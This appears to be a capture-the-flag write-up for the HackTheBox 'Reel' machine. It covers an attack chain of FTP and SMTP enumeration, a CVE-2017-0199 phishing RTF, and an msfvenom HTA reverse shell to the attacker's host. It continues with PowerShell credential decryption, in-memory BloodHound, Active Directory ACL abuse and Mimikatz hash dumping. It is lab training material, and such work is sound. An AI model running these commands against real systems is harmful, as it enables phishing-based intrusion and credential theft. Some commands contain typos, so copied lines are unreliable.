# HackTheBox-Reel ## NMAP ```bash PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_05-28-18 11:19PM documents | ftp-syst: |_ SYST: Windows_NT 22/tcp open ssh OpenSSH 7.6 (protocol 2.0) | ssh-hostkey: | 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA) | 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA) |_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519) 25/tcp open smtp? | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLS SessionReq, X11Probe: | 220 Mail Service ready | FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest: | 220 Mail Service ready | sequence of commands | sequence of commands | Hello: | 220 Mail Service ready | EHLO Invalid domain address. | Help: | 220 Mail Service ready | DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY\ | SIPOptions: | 220 Mail Service ready | sequence of commands | sequence of commands | sequence of commands | sequence of commands | sequence of commands | sequence of commands ``` ## PORT 21 (FTP) FTP has anonymous login enabled so we can easily login We see a folder named `documents` And in the folder we can see three files Opening the `Applocker.docx` file it tell about making rules for some scripts Opening `Windows Event Forwarding.docx` will warn us having a macro in it and will fail to recover document Lastly the text file has this conent in it ``` Please email me any rtf format procedures - I'll review and convert. new format / converted documents will be saved here. ``` So from this file it pretty much tells that we need to make a phishing rtf document and send it through mail but the question is send to whom ? We don't have any smb or ldap service which we can try to enumerate users from only smtp service is from where which can enumerate users but we do need a user first so running `exiftool` on word documents we get a username ## PORT 25 (SMTP) To check if it's a correct email addres we can use `VRFY` to check but that command is not allowed in this smtp server Instead we can use `RCPT` to check if the email address is valid And `nico@megabank.com` is a valid address on which we can send an email , now to send a rtf file windows had a CVE related to rtf which can allow remote commands to be executed which was given a CVE `CVE-2017-0199` http://rewtin.blogspot.com/2017/04/cve-2017-0199-practical-exploitation-poc.html ## Foothold Using an exploit from github we can craft a rtf in which we are going to include a url that will fetch hta file and it will execute on the system to give us a reverse shell for that we need to genrate a hta file using `msfvenom` ```bash sfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=2222 -f hta-psh > abc.hta ``` ```bash python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://10.1 0.14.17/abc.hta ``` Now to send the mail with the attachment , I was having difficulty to figure out to send it , on goolge every mentioned doing it through telnet by specifiying content-type and other headers but I found a neat tool called `sawks` http://www.jetmore.org/john/code/swaks/ So running this to send an email to `nico` and starting the python server to hosts the hta file ```bash swaks --server 10.10.10.77 -f arz@htb.reel -t nico@megbank.com --attach Invoice.rtf ``` In `nico`'s directory in `Desktop` folder we can see a `cred.xml` file, reading that file it seems that there's an encrpyted password for `Tom` ## Privilege Escalation (Tom) Now here I ran into an issue to decrpyt this we need powershell and when I ran powershell the reverse shell would just hang So we can just pass arguemnts to powershell and decrypt the password for user `Tom` ```powershell powershell.exe -c "$file = Import-Clixml -Path cred.xml;$file.GetNetworkCredential().Password" ``` Now that we have credentials for tom user we can use ssh to login Checking which groups this user is in In the Desktop directory we see a folder `AD Audit` which already has bloodhound folder in it And from the text file it seems that no path is there to domain admin We can import and run `PowerView` commands but I am just more comfortable with using bloodhound but we can't actually import sharphound script from the machine ## Privilege Escalation (Claire) So we can bypass this by loading the script in the memory through `IEX` which downloads the script and loads it into the memory ```powershell `Invoke-Bloodhound -CollectionMethod All -Domain HTB.LOCAL -ZipFileName loot.zip` ``` To transfer this we can use impacket's smbserver to copy the zip file onto our machine After this is transferred we can use bloodhound GUI to see what we can abuse in AD We have `WriteOwner` access on claire object so we can own this object and give `All` rights on this object in order to reset password ```powershell Set-DomainObjectOwner -Identity claire -OwnerIdentity tom -Verbose ``` ```powershell Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights All -Verbose ``` ## Privilege Escalation (Administrator) Now through `Claire` we can see that we have `WriteDacl` on `BACKUP_ADMINS` We can see the absue that we can add users to this group So logging in back with tom we see that we are a member of this group now But it gets reverted quickly so we need to be quick in navigating to `Administrators` folder and there we will find some backup scripts out which `BackupScript.ps1` has a password for administrator account Having the password we can login through ssh Further loading `Mimikatz` we can dump SAM hashes ## References - https://pentestmonkey.net/tools/user-enumeration/smtp-user-enum - https://www.ired.team/offensive-security/initial-access/t1187-forced-authentication - https://github.com/bhdresh/CVE-2017-0199 - https://linux.die.net/man/1/swaks - http://www.jetmore.org/john/code/swaks/ - https://mcpmag.com/articles/2017/07/20/save-and-read-sensitive-data-with-powershell.aspx - https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993